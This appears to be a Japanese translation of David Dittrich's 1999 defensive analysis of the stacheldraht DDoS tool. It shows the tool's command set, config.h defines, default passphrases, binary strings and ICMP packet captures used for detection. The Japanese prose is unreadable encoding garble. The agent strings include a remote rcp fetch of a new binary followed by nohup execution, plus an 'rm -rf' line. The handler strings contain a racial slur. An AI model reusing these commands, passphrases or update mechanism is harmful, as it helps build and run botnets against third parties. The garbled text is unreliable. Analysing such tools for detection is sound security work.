�ł��B�i�Ȃ��A��҂�David Dittrich���̋��Č��J���Ă���܂��BSpecial thanks to Mr. David Dittrich.�j
��Ғ��F���̕��͂̓A�����J�𑛂����Ă���g�p�s�\�U���́i�����炭�j�����ƂȂ��Ă���c�[���̈�Astacheldraht�̓���ɂ��Ẵ�
�|�[�g�ł��B�ً}�ɂ������ӂ��������������J���邱�Ƃɂ��܂����B�|��̐��x�ɂ��Ă͂��e�͉������B�܂��A�����Ӗ����ʂ�Ȃ������₨�������ȁH�Ƃ�
����������
�����������ĉ������B���������ނ̌�肷�ׂĂ̕��ӂ͂�������҂ɂ���܂����Ƃ����f�肵�Ă����܂��B��蓙���w�E������ƍK���ł��B������ł��B
�i�Ȃ��A��҂�David
Dittrich���̋��Č��J���Ă���܂��BSpecial thanks to Mr. David Dittrich.�j
�h��p�v���O������
�Ƃ̂��Ƃł��B
���̑��A
�Ƃ����h��p�v���O����������Ƃ̂��Ƃł��B
�܂��APacketStorm���10
Proposed 'first-aid' security measures against Distributed Denial
Of Service attacks�Ƃ����������ACisco��� Strategies
to Protect Against Distributed Denial of Service (DDoS) Attacks
�Ƃ������������\����Ă��܂��B�i�a��E�E�E���Ă܂���B���߂�Ȃ����i���j�j
���ɂ�Dragos
Ruiu���ɂ��DDOS
Proposal�Ƃ������������b
�N�������ɂ��a������Ă��܂��B�܂��ABennett
Todd����DDOS
Whitepaper�̖|����߁X��Web�������Ƃ̂��Ƃł��i���b�N��䎁�ɂ��|��j�B
2/12�F�V���Ƀ����[�X���ꂽstacheldraht
Ver.4�Ƃ̈Ⴂ���A���David Dittrich�������ׂ�Bugtraq
�Ƀ|�X�g���܂����B
Last Updated 2/22 Ver.1.2
stacheldraht���T�[�r�X�s�\�U���c�[��
David Dittrich <[email protected]>
University of Washington
Copyright 1999. All rights reserved.
December 29, 1999
����
�ȉ���stacheldraht�̕��͂ł���Bstacheldraht�Ƃ�TribeFlood Network���쐬�E���\�����T�[�r�X�s�\�U���c�[���̃\�[�X�R�[�h�Ɋ�Â��č쐬���ꂽ�A�T�[�r�X�s�\�U���c�[���ł���B�i��Ғ��F���̕��͂ɏo�Ă� ���Q��A�T�C�g����IP�A�h���X�͎����Ƃ͈قȂ��Ă��܂��j
stacheldraht�́i�h�C�c��Łu�t�������郏�C�A�v�j�A�I���W�i����TFN�c�[���ɂ�����T�[�r�X�s�\�U���c�[��trinoo�ɁA�U���� �ƁAstacheldraht�̃}�X�^�[����ю����I�ɃA�b�v�f�[�g�����G�[�W�F���g�Ƃ̊Ԃ̈Í����ʐM�@�\��t���������̂��B
trinoo��TFN�ɂ��Ă̏ڍ��͈ȉ��̃T�C�g���Q�Ƃ̂��ƁF
1999�N�̂U���㔼����V�����{�ɂ����āA�������̃O���[�v��trinoo���C���X�g�[�����e�X�g���Ă������A���̌��ʂQ�O�O�O�ȏ�̓���g�� ���V�X�e�����琬��l�b�g���[�N�𒆋K�͂����K�͂̃T�[�r�X�s�\�U�����P�����B����������A�̍U���́A�S���E�̃V�X�e�����������݁A�����đS���E��W�I �Ƃ��Ă��܂����B
1999�N�W���㔼����X�����{�A���Ԃ̒��ڂ�trinoo����A���̃I���W�i���R�[�h���Ɛ��肳���AMixter�쐬��TFN�ւƈڍs���͂��� ���B������1999�N�X���㔼����P�O�����{�A�ustacheldraht�v�Ƃ��Ēm����TFN�̃G�[�W�F���g�ɔ��ɂ悭�����v���O�������A���[���b �p��A�����J�̊e�V�X�e���ŏo�����n�߂��B
�����̍U���ɂ��Ă�CERT�������i�ԍ�99-04�j�Ƃ��ă����[�X���Ă���F
trinoo�Ɠ��l�Astacheldraht���}�X�^�[�i�n���h���[�j����daemon�A�܂��́ubcast�v�i�G�[�W�F���g�j�Ƃ��č���Ă� ��B�n���h���[�^�G�[�W�F���g�Ƃ������p���1999�N�P�P����CERT��DistributedSystemIntruderTools�i��T���^ �V�X�e���N���c�[���j���[�N�V���b�v�ŗp�����n�߂����̂ŁA�{���͂ł�stacheldraht����`�����p��̑���ɗp���邱�Ƃɂ���BCERT�� ���[�N�V���b�v���|�[�g�͂��Ј�ǂ������������F
stacheldraht�́A1999�N�P�Q���Ƀ����[�X���ꂽMixter��TFN�̐V�o�[�W�����ATribeFloodNetwork2000 �iTFN2K�j�Ƌ@�\�I�ɋ������镔��������������BTFN2K�ɂ��Ă̏ڍׂ́F
trinoo�̃n���h���[�^�G�[�W�F���g�@�\�̕������ɉ����āAstacheldraht���܂�ICMPflood,SYNflood, UDPflood��uSmurf�v�^�U���ɂ���āA��܂��ꂽ��̃l�b�g���[�N���T�[�r�X�s�\�ɒǂ����ދ@�\�������Ă���B�����I���W�i����TFN ��TFN2K�Ƃ͈قȂ�Astacheldraht�̃R�[�h�͂������ʂɂ��u�I���E�f�}���h�v��TCP�|�[�g�ɐ�]��root�V�F�����܂�ł��� ���i1999�N������Mixter�ɂ���Č��J���ꂽ����TFN�R�[�h�̕��͂ɂ��j�B
TFN�̎�_�̂P�ɁA�U���҂��W�I�l�b�g���[�N���R���g���[������}�X�^�[�i�������j�ɐڑ�����ۂɁA�N���A�e�L�X�g�̃t�H�[���ɂȂ��Ă��܂� �̂ŁA��\�I��TCP�̍U���i�Z�b�V�����E�n�C�W���b�N�ARST�ؒf�A���̑��j�ɂ��炳��Ă��܂��\��������A�Ƃ������̂�����B Stacheldraht�͂���ɑ��A�u�iStacheldraht�p��Łjtelnet�����́v�Í����N���C�A���g��lj����đΉ����Ă���B
Stacheldraht�̃G�[�W�F���g�͌��Ƃ��ǂ�Ɛ�������Solaris2.x�ł��̃o�C�i�����������Ă���BSolaris2.x�� RPC�̃T�[�r�X�ustatd�v��ucmsd�v��uttdbserved�v�ɁA�o�b�t�@�I�[�o�[�����̃o�O�ɂ��Z�L�����e�B�z�[�������������������� �]���𗎂Ƃ��Ă��܂������A�����̃o�O�͂��̕��͂�������������܂��ɖ������ԂŌ�����B�i��Ғ��F00�N�P���ȍ~���������������������Z�L���� �e�B�z�[���ł��ꂽ�H�Ƃ����b������j
�o�O�g���b�N��1999�N�P�Q����trinoo��TribeFloodNetwork�̕��͂��f�ڂ�����A���̒c�̂̎��������������܂ꂽ�A�J�E�� �g�̃t�@�C���L���b�V�����瓾��stacheldraht�̃\�[�X�R�[�h���������Ă��ꂽ�B�i���̒������Ɋ��ӂ������B�����Ă����������Ƃ��������邱�� ��e�F���Ă����I�[�v���ȃt�H�[�������J���Ă���Ă���SecurityFocus�̐l�X�ɂ����������ӂ������j���̕��͂͂��̃L���v�`���[�����\�[�X �R�[�h�i�\�[�X�ɂ��o�[�W�����P�D�P�A1999�N�W���P�T������1999�N�P�O���P�V���̊ԂɏC������Ă���j���g���čs���Ă���B
Makefile�Q�ɂ�Linux��Solaris�p�̃��[��������A�f�t�H���g��Linux�ɂȂ��Ă���iLinux��ł͂���܂肿���Ɠ��� �Ȃ��ɂ�������炸�j�B���̕��͂��s�����߂ɁA�S�Ẵv���O������RedHat6.0Linux�ŃR���p�C������A���삳�����B�킽���̉����Ă������� �́A�G�[�W�F���g��Solaris2.x�V�X�e���ł�����������Ă��Ȃ��B
trinoo��TribeFloodNetwork�Ɋւ��镪�͂ɂ����āA�ЂƂ������m�ɏq�ׂĂ��Ȃ����Ƃ��������B����́A�ǎҏ����̎��_�� �˂��Ē�`�Â�����u�]���ҁv�Ɓu�U���ҁv�ɂ���āA�Q�̃t�F�C�Y���琬��T�[�r�X�s�\�U�����s����A�Ƃ������Ƃ��B
�N���t�F�C�Y�̓T�[�r�X�s�\�U���t�F�C�Y�̌�̃t�F�C�Y�ł���B�T�[�r�X�s�\�U���t�F�C�Y�̒��ŁA�U���p�l�b�g���[�N�̃n���h���[�ƃG�[�W�F���g�� ���ꍞ�܂ꂽ���ʋ��]�������Ă��܂����V�X�e���́A�����T�C�g�ւ̏d���A����K�͂ȃT�[�r�X�s�\�U�������s�������Ă����B���������Ӗ��ő��̋]�� �ҁi�T�[�r�X�s�\�U���́j�ƌ����悤�B
�i�����̐N���ƃl�b�g���[�N�Z�b�g�A�b�v�̃t�F�C�Y�ŗp��������@�ɂ��ẮAtrinoo�l�b�g���[�N�̕��́�AppendixA�� �Q�Ƃ̂��Ɓj
�\�[�X�R�[�h�ɏC��������ƁA���̕��͂̍ו����v�����v�g��p�X���[�h�A�R�}���h�ATCP/UDP�̃|�[�g�ԍ��A�܂��̓T�|�[�g����Ă���U���� �@�A�V�O�j�`���A�@�\�ȂǂɕύX������\��������A��������Ȃ��Ƃ������Ƃ������Ă����Ăق����B
�U���p�l�b�g���[�N�F�N���C�A���g-->�n���h���[-->�G�[�W�F���g-->�]����
stacheldraht�l�b�g���[�N�͂P�����邢�͂���ȏ�̃n���h���[�v���O�����imserv.c�j�ƁA�G�[�W�F���g�̑傫�ȃZ�b�g �ileaf/td.c�j�Ō`�������B�U���҂́utelnet���ǂ��v�̈Í����v���O�������g���A�n���h���[�itelnetc/client.c�j�ɐڑ� ���ĒʐM����Bstacheldraht�l�b�g���[�N�͂���ȕ����F
+--------+ +--------+
| client | | client |
+--------+ +--------+
| |
. . . --+------+---------------+------+----------------+--. . .
| | |
| | |
+-----------+ +-----------+ +-----------+
| handler | | handler | | handler |
+-----------+ +-----------+ +-----------+
| | |
| | |
. . . ---+------+-----+------------+---+--------+------------+-+--. . .
| | | | |
| | | | |
+-------+ +-------+ +-------+ +-------+ +-------+
| agent | | agent | | agent | | agent | | agent |
+-------+ +-------+ +-------+ +-------+ +-------+
�U���҂͂P���邢�͕����̈Í����N���C�A���g�����n���h���[���R���g���[������B�e�n���h���[�͑����̃G�[�W�F���g���R���g���[���ł���B �imserv.c�̓����̐����l�͂P�O�O�O�G�[�W�F���g���B�Ȃ��P�O�O�O�Ƃ��������I�ꂽ�̂��͕�����Ȃ����A�R�[�h�́u�P�O�O�O�\�P�b�g��leet0 ���v�Ƃ������Ƃ��i��҈Ӗ��s���j�j�G�[�W�F���g�͂��ׂāA�P���邢�͕����̋]���҂ɑ��A�n���h���[���o�R���ăp�P�b�g�x�[�X�̍U�����������Ăčs�� �ׂ��\�������i�R�[�h��mserver��master server���Q�Ƃ̂��Ɓj�B
�ʐM
trinoo�̓n���h���[�ƃG�[�W�F���g�Ԃ̒ʐM��UDP���g���A�I���W�i����TribeFloodNetwork��ICMP���g�p���邪�A stacheldraht��TCP���g���Ă���B
stacheldraht�l�b�g���[�N�̉��u����́A���삷�鎩�����g�ƃn���h���[�Ƃ̊Ԃ̒ʐM�ɑΏ̃L�[�Í������g���P���ȃN���C�A���g���g���� ���s�����B�N���C�A���g�͂P�̈������ڑ��������n���h���[�̃A�h���X�����B�ڑ��ɂ�TCP�|�[�g�i�R�[�h�͂����Ƃ���f�t�H���g�� 16660/TCP�j���g����B
�U���҂͈ȉ��̂悤�ȉ�ʕ\�������邱�ƂɂȂ�i�ύX���Ȃ����̂܂܂̃p�X���[�h��p�����ꍇ�j�F
---------------------------------------------------------------------------
# ./client 192.168.0.1
[*] stacheldraht [*]
(c) in 1999 by ...
trying to connect...
connection established.
--------------------------------------
enter the passphrase : sicken
--------------------------------------
entering interactive session.
******************************
welcome to stacheldraht
******************************
type .help if you are lame
stacheldraht(status: a!1 d!0)>
---------------------------------------------------------------------------
�v�����v�g�ɂ͓����Ă���Ǝv����G�[�W�F���g���ia!�j�Ǝ���ł���Ǝv����G�[�W�F���g���id!�j�������ɕ\������Ă���B�R�}���h �u.help�v���g���Ɓi���̂��Ƃ̋c�_�̂��߂ɁA�����͖��m�ł���Ɖ��肵�܂��傤�I�j�T�|�[�g���Ă���R�}���h�Z�b�g��\������F
---------------------------------------------------------------------------
stacheldraht(status: a!1 d!0)>.help
available commands in this version are:
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort .mping
.madd .mlist .msadd .msrem .distro .help
.setusize .setisize .mdie .sprange .mstop .killall
.showdead .showalive
--------------------------------------------------
stacheldraht(status: a!1 d!0)>
---------------------------------------------------------------------------
�R�}���h
.distrouserserver
�G�[�W�F���g���C���X�g�[�����āA�V�X�e���u�T�[�o�[�v�ɑ���Berkeley�urcp�v�R�}���h�ƃA�J�E���g�uuser�v���g���������Łi�Ⴆ��
"rcpuser@server:linux.bin
ttymon"�j�������g��V���ɃR�s�[������@����������B
.help
�T�|�[�g�������R�}���h���X�g��\������B
.killall
�S�Ă̓��쒆�G�[�W�F���g��kill����B
.maddip1[:ip2[:ipN]]
�U���Ώۃ��X�g��IP�A�h���X��lj�����B
.mdie
�S�ẴG�[�W�F���g��die���N�G�X�g�𑗂�B
.mdos
DoS�U�����J�n����B
.micmpip1[:ip2[:ipN]]
ICMPflood�U�����w��z�X�g�ɑ��ĊJ�n����B
.mlist
���̏u�Ԃ�DoS�U��������Ă���z�X�g��IP�A�h���X���X�g��\������B
.mping
�����Ă邩�ǂ����m�F�̂��߂ɂ��ׂẴG�[�W�F���g��ping����ibcasts�j�B
.msadd
�A�N�Z�X�ł���T�[�o�[�̃��X�g�ɐV�����}�X�^�[�T�[�o�[�i�n���h���[�j��lj�����B
.msort
����ł���^�����Ă���G�[�W�F���g�ibcasts�j���\�[�g����B�iping�𑗂�A����ł���^�����Ă���G�[�W�F���g�̐��^�p�[�Z���e�[�W��\����
��j
.mstopip1[:ip2[:ipN]]
.mstopall
�w�肵��IP�A�h���X�̃z�X�g�A�������͂��ׂẴz�X�g�ւ̍U�����~����B
.msrem
�A�N�Z�X�ł���T�[�o�[�̃��X�g����}�X�^�[�T�[�o�[�i�n���h���[�j���폜����B
.msynip1[:ip2[:ipN]]
SYNflood�U�����w�肵���z�X�g�ɑ��ĊJ�n����B
.mtimerseconds
�U���������鎞�Ԃ̃^�C�}�[��ݒ肷��B�i�l�̓`�F�b�N����Ȃ��j
.mudpip1[:ip2[:ipN]]
UDPflood�U�����w�肵���z�X�g�ɑ��ĊJ�n����B
�iTrinooDoS�G�~�����[�V�������[�h�j
.setisize
flooding�pICMP�p�P�b�g�̃T�C�Y��ݒ肷��B�i�ő偁1024�A�f�t�H���g��1024�j
.setusize
flooding�pUDP�p�P�b�g�̃T�C�Y��ݒ肷��B�i�ő偁1024�A�f�t�H���g��1024�j
.showalive
�S�Ă̐����Ă���G�[�W�F���g�ibcasts�j��\������B
.showdead
�S�Ă̎���ł���G�[�W�F���g�ibcasts�j��\������B
.sprangelowport-highport
SYNflood�U���̃|�[�g�͈̔͂�ݒ肷��B�i�f�t�H���g��0-140�j
�p�X���[�h�h��
�N���C�A���g�v���O�������g�p���ăn���h���[�ɐڑ�������A�U���҂̓p�X���[�h���͂�v�������B���̃p�X���[�h�i�f�t�H���g�́usicken�v�j �́A�W���I��crypt()�Í����p�X���[�h�ŁA�l�b�g���[�N�o�R�n���h���[�ɑ�����O�Ƀp�X�t���[�Y �uauthentication�v�ɂ����Blowfish�Í��������i�G�[�W�F���g�ƃn���h���[�Ԃ̒ʐM���ׂẮA���̃p�X�t���[�Y�ɂ���� Blowfish�Í��������j�B
TFN�Ɠ������AC�̃}�N���iconfig.h�j�ɂ̓R�}���h�������Ɏg�p�����l��A�v���O�������B���̕ϐ��iHIDEME,HIDEKIDS�j ����`����Ă���B
---------------------------------------------------------------------------
#ifndef _CONFIG_H
/* user defined values for the teletubby flood network */
#define HIDEME "(kswapd)"
#define HIDEKIDS "httpd"
#define CHILDS 10
/* These are like passwords, you might want to change them */
#define ID_SHELL 1 /* to bind a rootshell */
#define ID_ADDR 699 /* ip add request for the flood server */
#define ID_SETPRANGE 2007 /* set port range for synflood */
#define ID_SETUSIZE 2006 /* set udp size */
#define ID_SETISIZE 2005 /* set icmp size */
#define ID_TIMESET 2004 /* set the flood time */
#define ID_DIEREQ 2003 /* shutdown request of the masterserver */
#define ID_DISTROIT 2002 /* distro request of the master server */
#define ID_REMMSERVER 2001 /* remove added masterserver */
#define ID_ADDMSERVER 2000 /* add new masterserver request */
#define SPOOF_REPLY 1000 /* spoof test reply of the master server
#define ID_TEST 668 /* test of the master server */
#define ID_ICMP 1055 /* to icmp flood */
#define ID_SENDUDP 2 /* to udp flood */
#define ID_SENDSYN 3 /* to syn flood */
#define ID_SYNPORT 4 /* to set port */
#define ID_STOPIT 5 /* to stop flooding */
#define ID_SWITCH 6 /* to switch spoofing mode */
#define ID_ACK 7 /* for replies to the client */
#define _CONFIG_H
#endif
---------------------------------------------------------------------------
�����̂悤�ɁA�ǂ�Ȓl���p�����Ă��邩�m���Ă��邱�Ƃ������ŒN��������ăG�[�W�F���g���d�����p���Ă��܂��āA���ʂƂ��Č�����l�ɂ��G�[ �W�F���g�ŃR�}���h�����s�����Ă��܂��悤�Ȏ��Ԃ�����邽�߂ɁA�e�l���i�f�t�H���g����j�ύX���邱�Ƃ��]�܂�Ă���B
�w��
trinoo��TribeFloodNetwork�Ɠ��l�ɁA�n���h���[�^�G�[�W�F���g�̃C���X�g�[���Ɏg���Ă�����@�́A��ʓI��Unix�V�X �e���ł̃v���O�����C���X�g�[���ŁA�v���O�����ƃt�@�C�����B�����邷�ׂĂ̕W���I�ȃI�v�V�����i��F�B���f�B���N�g���̎g�p�A�uroot�L�b�g�v�A�J�[ �l�����W���[���A���̑��j�ƑS�������ł���B
trinoo��TFN�ƈقȂ�stacheldraht�̋@�\�ɁA�I���f�}���g�̃G�[�W�F���g�A�b�v�O���[�h������B���̋@�\��Berkeley��rcp�R �}���h�i514/tcp�j���g���Ă��āA�������̃T�C�g�ŃL���b�V���Ƃ��ē��܂ꂽ�A�J�E���g���g���Ă��邱�Ƃ��������Ă���B�I���f�}���h�őS�Ă� �G�[�W�F���g�͌��ݓ����Ă���v���O�����C���[�W���폜���A�O�ɏo�Ă���T�C�g�^�A�J�E���g����rcp���g���ĐV�����R�s�[ �𗎂Ƃ��Ă��āAnohup�ŐV�����C���[�W���N�����āA�����exit����B
�t�@�C���V�X�e����ł��̃v���O��������肷�邽�߂ɁA�����́i�ҏW�s�j���ʕ�������B
������͈Í����N���C�A���g�iclient�j�Ɉȉ��̂悤�ɑg�ݍ��܂��F
------------------------------------------------------------------------------
. . .
connection closed.
usage: ./sclient <ip/host>
[*] stacheldraht [*]
(c) in 1999 by ...
trying to connect...
unable to resolv %s
unable to connect.
connection established.
--------------------------------------
enter the passphrase :
authentication
failed
authentication failed.
entering interactive session.
./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
huhu
. . .
------------------------------------------------------------------------------
������̓n���h���[�imserv�j�Ɉȉ��̂悤�ɑg�ݍ��܂��F
------------------------------------------------------------------------------
. . .
%d.%d.%d.%d
jbQ4yQaKLbFZc
* mtimer reached *
.quit
exiting...
you need to stop the packet action first.
.help
.version
[*]stacheldraht[*] mserver version: 1.1
setusize
setisize
mdos
mping
mudp
micmp
msyn
mstop
mtimer
madd
mlist
msort
msadd
msrem
distro
sprange
killall
showdead
showalive
add some bcasts mofo.
killing all active childs...
usage: .sprange <lowport-highport>
example: .sprange 0-140
low port is : %i
high port is : %i
request was sent to the network.
usage: .setusize <udp packet size (<=1024)>
current udp packet size is %ibytes
udp packet size was set to %i bytes.
udp packet size is too large.
usage: .setisize <icmp packet size (<=1024)>
current icmp packet size is %ibytes
icmp packet size was set to %i bytes.
icmp packet size is too large.
sending mass die request...
finished.
.mudp
starting trinoo emulation...
removing useful commands.
- DONE -
available commands in this version are:
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort .mping
.madd .mlist .msadd .msrem .distro .help
.setusize .setisize .mdie .sprange .mstop .killall
.showdead .showalive
usage: .distro <user> <server that runs rcp>
remember : the distro files need to be executable!
that means: chmod +x linux.bin , chmod +x sol.bin ;))
sending distro request to all bcasts....
user : %s
rcp server :
unable to resolve - %s
unable to send distro request.
request was sent, wait some minutes ;)
usage: .msrem <masterserver>
removing masterserver -
failed.
usage: .msadd <masterserver>
adding masterserver -
no packet action at the moment, sir.
the followings ip(s) are getting packeted...
--------------------------------------------
[*] stacheldraht [*] is packeting %d ips
[*] stacheldraht [*] is packeting 1 ip
.mstop all
deleting from packetlist...
%s - removed.
%s - skipped.
restarting packeting routines...
niggahbitch
usage: .madd <ip1:ip2:ip3:ip4>
adding to packetlist...
%s - added.
usage: .mtimer <seconds to packet>
packet timer was set to %d seconds
usage: .mstop <all> or <ip1:ip2:ip3:ip4:ip5 etc..>
packeting stopped.
usage: .msyn <ip1:ip2:ip3:ip4:ip5 etc..>
the net is already packeting.
mass syn flooding
%i floodrequests were sent to %i bcasts.
usage: .micmp <ip1:ip2:ip3:ip4:ip5 etc..>
mass icmp bombing
usage: .mudp <ip1:ip2:ip3:ip4:ip5 etc..>
mass udp bombing
tR1n00(status: a!%i d!%i)>
stacheldraht(status: a!%i d!%i)>
waiting for ping replies...
total bcasts : %d - 100%
alive bcasts : 0 - 0%
alive bcasts : %d - %d%
dead bcasts : %d - %d%
showing the alive bcasts...
---------------------------
alive bcasts: %i
showing the dead bcasts...
--------------------------
dead bcasts: %i
sorting out all the dead bcasts
-------------------------------
%d dead bcasts were sorted out.
bcasts
[*]-stacheldraht-[*] - forking in the background...
%i bcasts were successfully read in.
3.3.3.3
spoofworks
ficken
authentication
failed
******************************
welcome to stacheldraht
type .help if you are lame
./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
huhu
[0;35mTribe Flood Network (c) 1999 by
[5mMixter
. . .
------------------------------------------------------------------------------
������̓G�[�W�F���g�itd�j�Ɉȉ��̂悤�ɑg�ݍ��܂��F
------------------------------------------------------------------------------
. . .
%d.%d.%d.%d
ICMP
Error sending syn packet.
tc: unknown host
3.3.3.3
mservers
randomsucks
skillz
ttymon
rm -rf %s
rcp %s@%s:linux.bin %s
nohup ./%s
1.1.1.1
127.0.0.1
lpsched
no masterserver config found.
using default ones.
available servers: %i - working servers : 0
[*] stacheldraht [*] installation failed.
found a working [*] stacheldraht [*] masterserver.
masterserver is gone, looking for a new one
sicken
in.telne
./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
. . .
------------------------------------------------------------------------------
�e�G�[�W�F���g���N�������Ƃ��A�ǂ̃n���h���[���������R���g���[�����Ă���̂��w�K���邽�߂Ƀ}�X�^�[�T�[�o�[�̃R���t�B�O���[�V�����t�@�C���� �ǂ݂ɍs���B���̃t�@�C����IP�A�h���X�̃��X�g�ŁA�p�X�t���[�Y�urandomsucks�v���g����Blowfish�Í�������Ă���B�R���t�B�O���[ �V�����t�@�C����������Ȃ������ꍇ�́A�R���p�C�����ɑg�ݍ��܂ꂽ�P���邢�͕����̃n���h���[�̃f�t�H���gIP�A�h���X���g���i��L�̂Ƃ��肻��� 1.1.1.1��127.0.0.1�B�������C�ӂɕύX�\�ł���j�B
�G�[�W�F���g�͉\��������n���h���[�̃��X�g���ЂƂ��ь��肵����A���̃n���h���[���X�g�̍ŏ�����AID�t�B�[���h��666�A�f�[�^�t�B�[���h �Ɂuskillz�v�Ƃ���������߂�ICMP ECHO_REPLY�p�P�b�g���ЂƂ���B�}�X�^�[�����̃p�P�b�g��������ꍇ�́AID�t�B�[���h��667�A�f�[�^�t�B�[���h�Ɂuficken�v�� ����������߂�ECHO_REPLY�p�P�b�g���ЂƂ���Ԃ��B�i�����ŋC��t���˂Ȃ�Ȃ��̂́A�n���h���[�ƃG�[�W�F���g�̊Ԃł��Ƃ肳���p �P�b�g�́A�Ⴆ��1000���o�C�g�̑傫�ȃp�P�b�g�ɂȂ��Ă��܂��悤�ȃo�O������Ƃ������Ƃ��B�n���h���[�ƃG�[�W�F���g�͒���I�ɂ��� 666|skillz/667|ficken�̃p�P�b�g�𑗂����著��ꂽ�肵�Ă���B�Ƃ������Ƃ͂�����ICMP�p�P�b�g�����j�^�[���Ă���G�[ �W�F���g�^�}�X�^�[�����o�ł���Ƃ������Ƃ��j
sniffit�ł̓������ʂ����Ă݂悤�iTFN���͗p�ɏC���ς݂�sniffit���g���Ă���j�B�e�p�P�b�g�̓������ʂ��F
------------------------------------------------------------------------------
ICMP message id: 10.0.0.1 > 192.168.0.1
ICMP type: Echo reply
45 E 00 . 04 . 14 . 01 . 0F . 00 . 00 . 40 @ 01 . E9 . 53 S 0A . 00 . 00 . 01 .
C0 . A6 . 00 . 01 . 00 . 00 . B4 . 13 . 02 . 9A . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
73 s 6B k 69 i 6C l 6C l 7A z 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
. . . [60 lines of zeros deleted]
00 . 00 . 00 . 00 .
ICMP message id: 192.168.0.1 > 10.0.0.1
ICMP type: Echo reply
45 E 00 . 04 . 14 . 04 . F8 . 00 . 00 . 40 @ 01 . E5 . 6A j C0 . A6 . 00 . 01 .
0A . 00 . 00 . 01 . 00 . 00 . CE . 21 ! 02 . 9B . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
66 f 69 i 63 c 6B k 65 e 6E n 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
. . . [60 lines of zeros deleted]
00 . 00 . 00 . 00 .
------------------------------------------------------------------------------
ngrep���g���Č��Ă݂悤�F
------------------------------------------------------------------------------
# ngrep -x "*" icmp
interface: eth0 (0.0.0.0/0.0.0.0)
filter: ip and ( icmp )
Kernel filter, protocol ALL, raw packet socket
match: *
#
I 10.0.0.1 -> 192.168.0.1 0:0
02 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 73 6b 69 6c 6c 7a 00 00 ........skillz..
[ 61 lines of zeroes deleted ]
00 00 00 00 00 00 00 00 00 00 00 00 ............
#
I 192.168.0.1 -> 10.0.0.1 0:0
02 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 66 69 63 6b 65 6e 00 00 ........ficken..
[ 61 lines of zeroes deleted ]
00 00 00 00 00 00 00 00 00 00 00 00 ............
#
------------------------------------------------------------------------------
ngrep��tcpdump��tcpshow�����g���₷���ďo�͂��킩��₷�����A����قǑ����̃V�X�e���Ŏg���Ȃ��i�Ⴆ�ADigital Unix 4.x�̌��o�[�W�����i��������������_�ł�1.35�j�j�B
����ɁA���쒆�̃n���h���[�����o���邽�߂ɁA�G�[�W�F���g�͐�s����\�[�X�A�h���X��exit����悤�ȃp�P�b�g���������ǂ����������B ID666�ŁA�f�[�^�t�B�[���h���G�[�W�F���g�V�X�e���i�z�X�g���āA�����IP�A�h���X�Ƃ��ĉ��߂ł����ꍇ�ɂ̂݁j��IP�A�h���X��ICMP ECHO_REPLY�p�P�b�g�𑗂��ăe�X�g����B�i���̓��ʂȃp�P�b�g�́A���ʂ�0���ݒ肳��Ă���T�[�r�X�^�C�v�t�B�[���h�ɂ�7���ݒ肳��Ă���A �Ƃ������Ƃ������ď����Ă����j
�}�X�^�[�����̃p�P�b�g����M������AID1000�Ńf�[�^�t�B�[���h�Ɂuspoofworks�v�Ɠ�����ECHO_REPLY�p�P�b�g�ɂ���IP �A�h���X�ߍ���ʼn�������B�����ăG�[�W�F���g�����̃p�P�b�g����M������Aspoof_level��0�ɐݒ肷��iIP�A�h���X��32�r�b�g�S�Ă� �����ł��郂�[�h�j�Bspoof�����p�P�b�g�����O�Ƀ^�C���A�E�g���Ă��܂����ꍇ�́Aspoof_level��3�ɐݒ肷��iIP�A�h���X�̍Ō� 8�r�b�g�𓐒��ł��郂�[�h�j�B
�e�p�P�b�g�̓������ʂ͈ȉ��̒ʂ�i���̕��͂̂��߂Ƀp�b�`���Ă��ꂽtcpdump��tcpshow�ɂ���Č������ʂł���j�F
------------------------------------------------------------------------------
# tcpdump icmp
. . .
14:15:35.151061 3.3.3.3 > 192.168.0.1: icmp: echo request [tos 0x7]
14:15:35.177216 192.168.0.1 > 10.0.0.1: icmp: echo reply
. . .
# ngrep -x "*" icmp
interface: eth0 (0.0.0.0/0.0.0.0)
filter: ip and ( icmp )
Kernel filter, protocol ALL, raw packet socket
match: *
#
I 3.3.3.3 -> 192.168.0.1 8:0
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 31 30 2e 30 2e 30 2e 31 ........10.0.0.1
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 ........
#
I 192.168.0.1 -> 10.0.0.1 0:0
03 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 73 70 6f 6f 66 77 6f 72 ........spoofwor
6b 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ks..............
[ 60 lines of zeroes deleted ]
00 00 00 00 00 00 00 00 00 00 00 00 ............
#
------------------------------------------------------------------------------
